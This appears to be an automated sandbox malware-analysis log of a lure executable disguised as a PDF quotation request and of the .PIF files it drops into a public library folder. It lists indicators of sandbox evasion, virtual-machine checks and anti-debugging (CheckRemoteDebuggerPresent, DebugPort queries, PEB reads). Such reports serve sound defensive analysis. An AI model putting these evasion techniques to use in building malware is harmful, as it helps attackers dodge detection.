                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Allocates many large memory junks
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFMemory allocated: 2890000 memory commit 500006912Jump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFMemory allocated: 2891000 memory commit 500178944Jump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFMemory allocated: 28BC000 memory commit 500002816Jump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFMemory allocated: 28BD000 memory commit 500199424Jump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFMemory allocated: 28EE000 memory commit 501014528Jump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFMemory allocated: 29E6000 memory commit 500006912Jump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFMemory allocated: 29E8000 memory commit 500015104Jump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeMemory allocated: 2950000 memory commit 500006912Jump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeMemory allocated: 2951000 memory commit 500178944Jump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeMemory allocated: 297C000 memory commit 500002816Jump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeMemory allocated: 297D000 memory commit 500199424Jump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeMemory allocated: 29AE000 memory commit 501014528Jump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeMemory allocated: 2AA6000 memory commit 500006912Jump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeMemory allocated: 2AA8000 memory commit 500015104Jump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFMemory allocated: 2880000 memory commit 500006912Jump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFMemory allocated: 2881000 memory commit 500178944Jump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFMemory allocated: 28AC000 memory commit 500002816Jump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFMemory allocated: 28AD000 memory commit 500199424Jump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFMemory allocated: 28DE000 memory commit 501014528Jump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFMemory allocated: 29D6000 memory commit 500006912Jump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFMemory allocated: 29D8000 memory commit 500015104Jump to behavior
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE1096E rdtsc 6_2_2CE1096E
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifAPI coverage: 0.7 %
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifAPI coverage: 0.3 %
                      Source: C:\Users\Public\Libraries\kmtqwssC.pif TID: 7220Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Users\Public\Libraries\kmtqwssC.pif TID: 7648Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Users\Public\Libraries\kmtqwssC.pif TID: 7972Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeCode function: 1_2_029558B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,1_2_029558B4
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1402350851.0000000000972000.00000004.00000020.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1402350851.000000000090E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1402350851.0000000000972000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW3d
                      Source: Csswqtmk.PIF, 00000008.00000002.1543370481.000000000067B000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000002.1657443974.0000000000768000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeAPI call chain: ExitProcess graph end nodegraph_1-29198
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifProcess information queried: ProcessInformationJump to behavior

                      Anti Debugging

                      barindex
                      Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeCode function: 1_2_0296EBF0 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,1_2_0296EBF0
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifProcess queried: DebugPortJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess queried: DebugPortJump to behavior
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifProcess queried: DebugPortJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess queried: DebugPortJump to behavior
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifProcess queried: DebugPortJump to behavior
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE1096E rdtsc 6_2_2CE1096E
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_00417B33 LdrLoadDll,6_2_00417B33
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeCode function: 1_2_029687A0 LoadLibraryW,GetProcAddress,FreeLibrary,1_2_029687A0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE02CF0 mov eax, dword ptr fs:[00000030h]6_2_2CE02CF0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE02CF0 mov eax, dword ptr fs:[00000030h]6_2_2CE02CF0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE02CF0 mov eax, dword ptr fs:[00000030h]6_2_2CE02CF0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE02CF0 mov eax, dword ptr fs:[00000030h]6_2_2CE02CF0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDCCCC8 mov eax, dword ptr fs:[00000030h]6_2_2CDCCCC8
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE4CCA0 mov ecx, dword ptr fs:[00000030h]6_2_2CE4CCA0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE4CCA0 mov eax, dword ptr fs:[00000030h]6_2_2CE4CCA0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE4CCA0 mov eax, dword ptr fs:[00000030h]6_2_2CE4CCA0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE4CCA0 mov eax, dword ptr fs:[00000030h]6_2_2CE4CCA0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDC8C8D mov eax, dword ptr fs:[00000030h]6_2_2CDC8C8D
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE80CB5 mov eax, dword ptr fs:[00000030h]6_2_2CE80CB5
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE80CB5 mov eax, dword ptr fs:[00000030h]6_2_2CE80CB5
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE80CB5 mov eax, dword ptr fs:[00000030h]6_2_2CE80CB5
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE80CB5 mov eax, dword ptr fs:[00000030h]6_2_2CE80CB5
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE80CB5 mov eax, dword ptr fs:[00000030h]6_2_2CE80CB5
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE80CB5 mov eax, dword ptr fs:[00000030h]6_2_2CE80CB5
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE80CB5 mov eax, dword ptr fs:[00000030h]6_2_2CE80CB5
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE80CB5 mov eax, dword ptr fs:[00000030h]6_2_2CE80CB5
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE80CB5 mov eax, dword ptr fs:[00000030h]6_2_2CE80CB5
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE80CB5 mov eax, dword ptr fs:[00000030h]6_2_2CE80CB5
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE80CB5 mov eax, dword ptr fs:[00000030h]6_2_2CE80CB5
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE80CB5 mov eax, dword ptr fs:[00000030h]6_2_2CE80CB5
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE80CB5 mov eax, dword ptr fs:[00000030h]6_2_2CE80CB5
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDF8CB1 mov eax, dword ptr fs:[00000030h]6_2_2CDF8CB1
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDF8CB1 mov eax, dword ptr fs:[00000030h]6_2_2CDF8CB1
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDDAC50 mov eax, dword ptr fs:[00000030h]6_2_2CDDAC50
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDDAC50 mov eax, dword ptr fs:[00000030h]6_2_2CDDAC50
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDDAC50 mov eax, dword ptr fs:[00000030h]6_2_2CDDAC50
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDDAC50 mov eax, dword ptr fs:[00000030h]6_2_2CDDAC50
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDDAC50 mov eax, dword ptr fs:[00000030h]6_2_2CDDAC50
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDDAC50 mov eax, dword ptr fs:[00000030h]6_2_2CDDAC50
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD6C50 mov eax, dword ptr fs:[00000030h]6_2_2CDD6C50
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD6C50 mov eax, dword ptr fs:[00000030h]6_2_2CDD6C50
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD6C50 mov eax, dword ptr fs:[00000030h]6_2_2CDD6C50
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE04C59 mov eax, dword ptr fs:[00000030h]6_2_2CE04C59
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE6CC20 mov eax, dword ptr fs:[00000030h]6_2_2CE6CC20
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE6CC20 mov eax, dword ptr fs:[00000030h]6_2_2CE6CC20
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE74C34 mov eax, dword ptr fs:[00000030h]6_2_2CE74C34
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE74C34 mov eax, dword ptr fs:[00000030h]6_2_2CE74C34
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE74C34 mov eax, dword ptr fs:[00000030h]6_2_2CE74C34
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE74C34 mov eax, dword ptr fs:[00000030h]6_2_2CE74C34
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE74C34 mov eax, dword ptr fs:[00000030h]6_2_2CE74C34
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE74C34 mov eax, dword ptr fs:[00000030h]6_2_2CE74C34
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE74C34 mov ecx, dword ptr fs:[00000030h]6_2_2CE74C34
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDE0C00 mov eax, dword ptr fs:[00000030h]6_2_2CDE0C00
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDE0C00 mov eax, dword ptr fs:[00000030h]6_2_2CDE0C00
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDE0C00 mov eax, dword ptr fs:[00000030h]6_2_2CDE0C00
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDE0C00 mov eax, dword ptr fs:[00000030h]6_2_2CDE0C00
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE0CC00 mov eax, dword ptr fs:[00000030h]6_2_2CE0CC00
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE54C0F mov eax, dword ptr fs:[00000030h]6_2_2CE54C0F
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDCEC20 mov eax, dword ptr fs:[00000030h]6_2_2CDCEC20
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDFEDD3 mov eax, dword ptr fs:[00000030h]6_2_2CDFEDD3
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDFEDD3 mov eax, dword ptr fs:[00000030h]6_2_2CDFEDD3
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE70DF0 mov eax, dword ptr fs:[00000030h]6_2_2CE70DF0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE70DF0 mov eax, dword ptr fs:[00000030h]6_2_2CE70DF0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDC6DF6 mov eax, dword ptr fs:[00000030h]6_2_2CDC6DF6
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDFCDF0 mov eax, dword ptr fs:[00000030h]6_2_2CDFCDF0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDFCDF0 mov ecx, dword ptr fs:[00000030h]6_2_2CDFCDF0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE54DD7 mov eax, dword ptr fs:[00000030h]6_2_2CE54DD7
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE54DD7 mov eax, dword ptr fs:[00000030h]6_2_2CE54DD7
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDCCDEA mov eax, dword ptr fs:[00000030h]6_2_2CDCCDEA
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDCCDEA mov eax, dword ptr fs:[00000030h]6_2_2CDCCDEA
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDDADE0 mov eax, dword ptr fs:[00000030h]6_2_2CDDADE0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDDADE0 mov eax, dword ptr fs:[00000030h]6_2_2CDDADE0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDDADE0 mov eax, dword ptr fs:[00000030h]6_2_2CDDADE0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDDADE0 mov eax, dword ptr fs:[00000030h]6_2_2CDDADE0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDDADE0 mov eax, dword ptr fs:[00000030h]6_2_2CDDADE0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDDADE0 mov eax, dword ptr fs:[00000030h]6_2_2CDDADE0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDF0DE1 mov eax, dword ptr fs:[00000030h]6_2_2CDF0DE1
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE06DA0 mov eax, dword ptr fs:[00000030h]6_2_2CE06DA0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE98DAE mov eax, dword ptr fs:[00000030h]6_2_2CE98DAE
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE98DAE mov eax, dword ptr fs:[00000030h]6_2_2CE98DAE
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CEA4DAD mov eax, dword ptr fs:[00000030h]6_2_2CEA4DAD
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE0CDB1 mov ecx, dword ptr fs:[00000030h]6_2_2CE0CDB1
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE0CDB1 mov eax, dword ptr fs:[00000030h]6_2_2CE0CDB1
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE0CDB1 mov eax, dword ptr fs:[00000030h]6_2_2CE0CDB1
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDF8DBF mov eax, dword ptr fs:[00000030h]6_2_2CDF8DBF
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDF8DBF mov eax, dword ptr fs:[00000030h]6_2_2CDF8DBF
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD0D59 mov eax, dword ptr fs:[00000030h]6_2_2CDD0D59
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD0D59 mov eax, dword ptr fs:[00000030h]6_2_2CDD0D59
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD0D59 mov eax, dword ptr fs:[00000030h]6_2_2CDD0D59
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD8D59 mov eax, dword ptr fs:[00000030h]6_2_2CDD8D59
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD8D59 mov eax, dword ptr fs:[00000030h]6_2_2CDD8D59
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD8D59 mov eax, dword ptr fs:[00000030h]6_2_2CDD8D59
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD8D59 mov eax, dword ptr fs:[00000030h]6_2_2CDD8D59
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD8D59 mov eax, dword ptr fs:[00000030h]6_2_2CDD8D59
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE68D6B mov eax, dword ptr fs:[00000030h]6_2_2CE68D6B
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE58D20 mov eax, dword ptr fs:[00000030h]6_2_2CE58D20
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDC6D10 mov eax, dword ptr fs:[00000030h]6_2_2CDC6D10
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDC6D10 mov eax, dword ptr fs:[00000030h]6_2_2CDC6D10
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDC6D10 mov eax, dword ptr fs:[00000030h]6_2_2CDC6D10
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDEAD00 mov eax, dword ptr fs:[00000030h]6_2_2CDEAD00
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDEAD00 mov eax, dword ptr fs:[00000030h]6_2_2CDEAD00
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDEAD00 mov eax, dword ptr fs:[00000030h]6_2_2CDEAD00
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE88D10 mov eax, dword ptr fs:[00000030h]6_2_2CE88D10
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE88D10 mov eax, dword ptr fs:[00000030h]6_2_2CE88D10
